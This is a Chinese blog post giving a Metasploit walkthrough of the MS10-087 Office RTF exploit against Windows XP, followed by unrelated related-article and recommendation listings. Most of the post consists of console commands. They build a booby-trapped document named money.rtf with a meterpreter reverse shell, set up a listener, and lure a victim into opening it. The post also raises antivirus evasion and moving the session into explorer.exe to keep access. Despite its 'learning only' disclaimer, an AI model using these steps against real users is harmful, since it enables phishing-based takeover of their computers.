【声明:以下测试仅仅为了学习用途,模仿尝试与博主无关】
工  具:metasploit
目标机:windows xp sp3 
步骤:
1、使用msf创建特殊代码的doc文档
命令:
msfconsole 进入metasploit控制台
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof   //调用ms10-087模块
msf  exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/meterpreter/reverse_tcp  //设定攻击载荷为反弹TCP连接会话
msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.1.129  //设置反弹连接目标IP
msf  exploit(ms10_087_rtf_pfragments_bof) > set LPORT 8080                 //设置反弹连接目标端口号
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME money.rtf     //创建的word文档名称为money.rtf,格式必须是rtf,一会儿我们再把它改名为.doc也是可以正常执行的。
msf  exploit(ms10_087_rtf_pfragments_bof) > exploit     //生成带攻击代码的word文档

2、渗透主机上开启msf监听80端口等待meterpreter的反弹会话
命令:
msf  exploit(ms10_087_rtf_pfragments_bof) > use exploit/multi/handler
msf  exploit(handler) > set LHOST 192.168.1.129
msf  exploit(handler) > set LPORT 8080
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > exploit
 
3、将文档放置到目标机并启动。(一旦用户打开该文档我们即可获得目标主机权限)
【这一步是个难点:1.如何将文档引诱用户下载 2.如何对该文档免杀】
需要注意的是对方一旦打开word文档看到没什么东西,关闭掉word文档的话我们的会话就断开了,所以应该在获得反弹后首先把反弹连接迁移到一个不容易被用户关闭的进程中去
PS 查看目标主机进程,我们可以使用explorer.exe ,查看其PID
 
4、执行:migrate explorer进程ID
 
参考http://blog.sina.com.cn/s/blog_4c86552f0102wlao.html

MS10-087微软OFFICE漏洞【参考拿机模拟】的更多相关文章

  1. CVE-2017-8759 微软word漏洞复现以及利用

    CVE-2017-8759 微软word漏洞复现以及利用 0x00 漏洞描述 近日,360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击,攻击使用了9月12日补丁刚修复的.NET ...

  2. 微软Office与金山WPS Office有何私密关系?

    新浪科技讯,9月1日午间消息,国家工商总局在其官网公布消息称.对微软公司副总裁陈实进行反垄断调查询问,要求微软就其综合情况以及企业反映的微软公司Windows操作系统和Office办公软件相关信息没有 ...

  3. 官方文档:Office VBA 参考

    https://docs.microsoft.com/zh-CN/office/vba/api/overview/    Office VBA 参考 https://docs.microsoft.co ...

  4. [视频]K8飞刀 ms15022 office漏洞演示动画

    [视频]K8飞刀 ms15022 office漏洞演示动画 https://pan.baidu.com/s/1eQnV8qQ

  5. 使用ABAP编程实现对微软Office Word文档的操作

    SAP ABAP里提供了一个标准的类CL_DOCX_DOCUMENT,提供了本地以".docx"结尾的微软Office word文档的读和写操作. 本文介绍了ABAP类CL_DOC ...

  6. 写了此书《微软Azure实战参考》 北京航空航天大学出版社 2019年7月

    经过大半年的努力,写出了此书<微软Azure实战参考> 北京航空航天大学出版社 2019年7月.喜爱微软云平台和需要使用微软云技术的读者,可以参考一下.

  7. Office VBA 参考

    Office VBA 参考:https://docs.microsoft.com/zh-CN/office/vba/api/overview/

  8. 如何通过WiFi来进行Android的真机模拟

    我们知道,在使用模拟机模拟的时候会出现较多的问题,所以如果有一部Android手机的话进行真机模拟是极好的. 准备工作: 第一种方法:使用数据线,具体操作百度.略(非WIFI操作的真机模拟) 第二方法 ...

  9. 微软office web apps 服务器搭建之在线文档预览(一)

    office web apps安装 系统要求为Windows Server 2012, 注意:转换文档需要两台服务器,一台为转换server,另外一台为域控server.(至于为什么要两台,这个请自行 ...

随机推荐

  1. C#语言基础——递归

    递归 一.概念conception: 函数体内调用本函数自身,直到符合某一条件不再继续调用. 二.应满足条件factor: (1)有反复执行的过程(调用自身): (2)有跳出反复执行过程的条件(函数出 ...

  2. 【RDA】使用RDA(Remote Diagnostic Agent)工具对数据库进行健康检查

    [RDA]使用RDA(Remote Diagnostic Agent)工具对数据库进行健康检查 分类: Linux RDA英文全称叫做"Oracle Remote Diagnostic Ag ...

  3. SQL中EXISTS的使用

    1.简介 不相关子查询:子查询的查询条件不依赖于父查询的称为不相关子查询. 相关子查询:子查询的查询条件依赖于外层父查询的某个属性值的称为相关子查询,带EXISTS 的子查询就是相关子查询 EXIST ...

  4. ORACLE lag()与lead() 函数

    一.简介 lag与lead函数是跟偏移量相关的两个分析函数,通过这两个函数可以在一次查询中取出同一字段的前N行的数据(lag)和后N行的数据(lead)作为独立的列,从而更方便地进行进行数据过滤.这种 ...

  5. uboot的配置流程分析

    简单介绍一下uboot的基本配置流程.和绝大多数源码编译安装一样,uboot在执行make之前需要执行make XXXconfig来配置相关信息,而且uboot本身是针对多种平台的bootloader ...

  6. 将Centos的yum源更换为国内的阿里云源

    阿里云是最近新出的一个镜像源.得益于阿里云的高速发展,这么大的需求,肯定会推出自己的镜像源.阿里云Linux安装镜像源地址:http://mirrors.aliyun.com/ CentOS系统更换软 ...

  7. 4-3 管理及IO重定向

    1. 系统设定默认输出设备:标准输出(STDOUT,1) 系统设定默认输入设备:标准输入(STDIN,0) 系统设定默认错误设备:标准错误(STDERR,2) 2. 标准输入:键盘 标准输出和错误输出 ...

  8. 2-ser2003系统封装实验报告

    Ser2003需要挂载系统镜像 至此,ser2003的母盘制作完成!!! 来自为知笔记(Wiz) 附件列表

  9. Ubuntu在wps-office等qt5程序下不能切换中文fcitx输入法的问题

    经检查,是缺了fcitx-qt的包.比如qt5的程序,需要一个叫fcitx-libs-qt5的包. 如果您在基于qt的程序下不能使用基于fcitx的中文输入法,请检查以下包是否已安装: sudo ap ...

  10. 轻量级C#编辑器RoslynPad

    简介 RoslynPad是一个Apache 2.0协议开源的轻量级C#编辑器.支持自动完成,语法提示,修改建议等功能.很适合平时随手写个C#程序看看运行结果. 目前版本:0.10.1,无需保存也可以运 ...